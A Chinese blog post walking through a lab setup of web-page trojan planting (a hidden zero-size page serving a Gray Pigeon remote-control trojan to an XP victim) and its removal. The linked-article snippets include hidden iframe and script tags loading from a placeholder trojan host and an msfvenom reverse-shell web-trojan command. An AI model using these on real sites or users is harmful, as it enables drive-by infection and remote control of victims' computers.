网页木马挂马的实现与防范

最新推荐文章于 2024-04-14 19:57:03 发布
最新推荐文章于 2024-04-14 19:57:03 发布
阅读量2.3k 收藏 19
点赞数 1
分类专栏: 网络攻防 文章标签: 网络 安全 网络安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43678263/article/details/128268303
版权

一、网页挂马是什么

不少用户都碰到过这样的现象:打开一个网站,结果页面还没显示,杀毒软件就开始报警,提示检测到木马病毒。有经验的朋友会知道这是网页恶意代码,这就是典型的网页挂马现象。那么是什么原因导致了这种现象的发生呢?其中最有可能的一个原因就是网页挂马的目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着用户的电脑已经遭到了攻击和控制。不过为达到目的,首先用户要将木马下载到本地,然后执行木马。

二、网页挂马的实现

(一)开启Apache服务

在这里插入图片描述

(二)设置工具灰鸽子的IP地址(即网站访问地址),生成服务端程序

在这里插入图片描述

(三)修改配置文件trojan.htm中本地网页地址

在这里插入图片描述
在这里插入图片描述

(四)添加长宽高都为0的木马页,目的是为了不让该页面显示出来

在这里插入图片描述

(五)查看一下网页服务开启状态

在这里插入图片描述

(六)在XP上访问被挂马的网站

在这里插入图片描述

(七)挂马成功,Win7上看到XP上线,可控制该肉鸡

在这里插入图片描述

三、网页挂马的防范

被挂马后,本地删除木马

(1)删除Internet临时文件夹中所有内容
在这里插入图片描述
(2)将显示隐藏文件及文件夹的按钮打开,打开后便可看到隐藏的木马执行程序
在这里插入图片描述
在这里插入图片描述
(3)右键该程序,将启动类型修改为已禁用
在这里插入图片描述
(4)在注册表中删除该程序
在这里插入图片描述
(5)在控制端看到木马已下线,代表彻底删除
在这里插入图片描述

youhao108
关注
  • 1
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
html网页挂马,浏览器安全网页挂马实战 ——合天网安实验室学习笔记
weixin_29310605的博客
06-18 2622
实验连接网页挂马指的是把一个木马程序上传到网站里面,使得木马在打开网页时运行。网页挂马方式包括框架挂马、js文件挂马、body挂马、css挂马、图片假装等。经过实验了解网页挂马相关知识,学会使用框架挂马并进行相关利用。css实验简介实验所属系列: Web安全web实验对象: 本科/专科信息安全专业数据库相关课程及专业: 计算机基础、HTML、Linuxapache实验类别: 实践实验类vim预备知...
网页挂马的原理和实现方式
weixin_33670786的博客
11-21 4862
网页挂马 一、网页挂马介绍 (1)、挂马与网马 1、挂马 Ø从“挂马”这个词中就知道,它和“木马”脱离不了关系,的确,挂马的目的就是将木马传播出去 Ø黑客入侵了一些网站之后,将自己编定的网页木马嵌入到其网站的页面(能常是在网站主页)中,利用该网站的流量将自己的网页木马传播出去从页达到自己的目的 2、网马 Ø网马,即“网页木马”,就是将木马网页结合在一起...
防范网页挂马攻击 从对WEB站点进行安全评估开始
04-26
对于一些大型网站来说,通常拥有一整套已经执行了的WEB站点安全防范解决方案,但是,为什么一些网站还是会被攻击者挂载木马?其中一个最主要的原因是已经实施的WEB站点安全解决方案只能够应对已经出现的安全漏洞和威胁。而攻击者总是在通过各种手段来分析网站中可能会存在的弱点或漏洞,以便能够成功绕过网站当前的安全防范措施来实施挂马攻击。针对这样的一种WEB站点安全现状,最好的方式就是在部署相应的安全防范安全解决方案的同时,还必需采取与攻击者相同的手段,也就是在网站的运营过程中,不断对它进行安全评估,以此来找到网站中可能存在的弱点和漏洞。
防御挂马攻击:从防御到清除的最佳实践,网络安全小技巧
最新发布
2401_83944297的博客
04-14 823
挂马攻击是指攻击者利用各种手段,在目标服务器或网站中植入恶意程序。这些恶意程序通常用于获取系统权限或窃取敏感信息。攻击者会利用各种漏洞或技术,如iframe框架挂马、JS挂马、Body挂马、隐蔽挂马、CSS挂马等,来实施挂马攻击。挂马攻击的危害性极大。一旦网站被挂马,黑客可以获取该网站用户的账号密码、业务数据等敏感信息。如果用户访问了被攻击的网站,其计算机可能被植入恶意木马病毒,导致数据泄露和系统损坏。
Web安全-浅析网页暗链与挂马攻击
热门推荐
道阻且长,行则将至。
02-28 1万+
文章目录前言暗链现状暗链隐蔽性暗链产业链暗链的危害暗链的防御暗链实例暗链技术HTML隐藏型JS引入型暗链暗链检测思路 前言 近年来,随着国家相关部门对互联网安全事件的重视、部分软件开发厂商安全意识的提高,曾经红极一时的“挂马”攻击手段已经日趋减少,特别是 2009 年刑法明确“挂马”事件量刑标准之后,多个曾经猖狂一时的 ”挂马” 集团相继落网,“挂马”这种风险高且收益不稳定的攻击手段逐步为黑色产业链所抛弃。黑色产业链是否因为挂马的衰落而就此沉寂呢?答案是否定的,攻击手段日新月异,其中“暗链”是近年来较为严重
【XSS漏洞】通过XSS实现网页挂马
Monsterlz123的博客
06-07 7566
【XSS漏洞】通过XSS实现网页挂马 Hello,各位小伙伴们大家好~ 端午假期第一天,大家玩嗨了嘛? 小编是玩嗨了,毕竟已经拖更五天了… 好啦,直接进入正题吧,前面也写了两期XSS相关的内容,今天就来点高大上的(并不是!),我们来通过XSS实现网页挂马吧~ 一、准备工作 实验拓扑: 实验分为两部分: 1、通过Kali linux,利用MS14_064漏洞,制作一个木马服务器。存在该漏洞的...
网站频繁被挂马篡改 防止网站被攻击的解决妙招
weixin_67757219的博客
02-09 396
很感兴趣的朋友们一块儿看一下SINE安全是如何解决网站被挂马的。公司网站被挂马,尤其是灰色行业数据,如今百度搜索引擎这方面打压测试的严,只要是查找公司网站上面有这种的信息,就会统一行动实行处罚,对公司网站采取被降权惩罚,减少搜索引擎排名,比较严重的会立即K站,那如此一来关键词优化数据信息就重回解放初期,要想修补这周期时间就相对比较长,通常要1-3个月才可以修补,因此,防止公司网站发生那些状况,务必要增强公司网站的安全系数,防止被攻击,造成公司利润受损。2、向各百度搜索引擎提交申诉,及描述被挂马的情况。
网页病毒挂马原理解析
bing_JavaScript的博客
05-05 4882
所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自
网站服务器被挂马的处理方案
Naola 的专栏作品
04-28 6307
本方案主要解决网站的 WEB服务器出现木马的情况后,操作指导手册。根据先期摸索处理的经验,整理此文档,若有不足,请指出补充。   前言:服务器木马防范应以预防为主,加强软硬件防火墙管理。加强程序健壮性测试,及时检测,修复,操作系统,应用平台,WEB程序可能存在的漏洞和后门。由于面向互联网的WEB服务的特性,决定了WEB服务器具有开放性,无法从根本上拒绝来自互联网任意一台电脑上的非法请求,但也
网页挂马工作原理完全分析
01-09
网页挂马工作原理完全分析,希望识货的人过来赶快拿啊~~
你知道吗?CSS样式表也能挂网页木马
12-09
他们发现,用来制作网页特效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式其实是从防范IFRAME挂马的CSS代码演变而来。  随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机。他们发现...
黑客选择CSS挂马 CSS挂马攻防实录
11-30
而比较讽刺的是,CSS挂马方式其实是从防范E挂马的CSS代码演变而来。  安天实验室阿楠:安全工程师,从事病毒分析多年。  网站挂马的手段最初非常单一,但是随着Web2.0技术以及Blog、Wiki等广泛的应用,挂马也...
Asp常见挂马方式大总结
10-28
指在告诉大家坏人经常使用的网页挂马方式,从而可以对自己的网页进行防范,只要检测这些经常被用于挂马的地方,很容易找到木马的所在。
php pwuj 挂马,网站挂马原理及实战
weixin_39683025的博客
03-11 437
注:本文仅供学习参考网页挂马简介网页挂马指的是把一个木马程序上传到一个网站里面,然后用木马生成器生成一个网马,放到网页空间里面,再加代码使得木马在打开网页时运行。网页挂马工作原理作为网页挂马的散布者,其目的是将木马下载到用户本地并进一步执行,当木马得到执行后,就意味着会有更多的木马被下载,且进一步被执行。这样就进入一个恶性的循环,从而使用户的电脑遭到攻击和控制。为达到目的首先要将木马下载到本地。常...
解决DEDECMS网页木马(含iframe/script木马)
zxy840552216的博客
08-25 254
先说明一下,不要一挂马就说dede有漏洞,请先阅读关于服务器被批量挂马的解决方案 这里告诉大家用CSS代码屏蔽iframe/script木马 注意,以下地址含有木马,请不要轻易访问: 解决方案1: Copy code iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/ script{nojs1:expression((this.src.toLowerCase().index.
网页木马是什么原理?
IT技术宅-北方的刀郎
03-21 2420
网页挂马的实质是利用漏洞向用户传播木马下载器,当我们更清楚了这点就能做到有效的防范网页木马就是网页恶意软件威胁的罪魁祸首,和大家印象中的不同,准确的说,网页木马并不是木马程序,而应该称为网页木马“种植器”,也即一种通过攻击浏览器或浏览器外挂程序(目标通常是IE浏览器和ActiveX程序)的漏洞,向目标用户机器植入木马、病毒、密码盗取等恶意程序的手段首先明确,网页木马实际上是一个HTML网页,与其
浅谈HTA(HTML Application)和病毒
yunxiang1224的博客
03-19 2490
一 HTA是什么 HTA是HTML应用程序(HTML Application)的缩写,可以使用html中的绝大多数标签、脚本等。直接将HTML保存成HTA的格式,就是一个能够独立运行的应用软件。 与普通HTML网页相比,它多了个HTA:APPLICATION标签,其实就是这个标签提供了一系列面向应用程序的功能。最重要的是:它能够让你访问客户的机器,而不用担心安全的限制。 运行后缀名为hta的文...
常见网站挂马方式 网站挂马可利用漏洞 网站加密挂马
ShenZ的博客
08-24 920
网站挂马 常见挂马方式 框架(iframe)挂马 <iframe src=http://www.trojan.com/ width=0 height=0></iframe> //宽度和高度都为0 js文件挂马 <script src=http://www.trojan.com/1.js></script> //1.js文件中可能有恶意代码 js变形加密 <script language="JScript.Encode">
kali生成网页木马
09-04
在Kali Linux中,你可以使用msfvenom来生成网页木马。 msfvenom是一个强大的工具,可以生成各种类型的恶意软件。要生成一个网页木马,你可以使用以下命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP地址> LPORT=<监听端口> -f <输出格式> > <文件名.html> 其中,windows/meterpreter/reverse_tcp是一个常用的载荷,它会在目标机器上反向连接你的Kali主机。LHOST是你的Kali主机的IP地址,LPORT是监听连接的端口号。你可以根据需要修改这两个参数。另外,你还需要指定输出格式和文件名,通常可以选择html作为输出格式。 请记住,生成网页木马是为了研究和学习安全知识,未经授权使用它可能是非法的。确保遵守法律和道德规范,并仅在授权的环境中使用这些工具。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [kali msfvenom生成木马](https://blog.csdn.net/qq_33391644/article/details/79266724)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

youhao108

行行好吧,揭不开锅了~QAQ

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值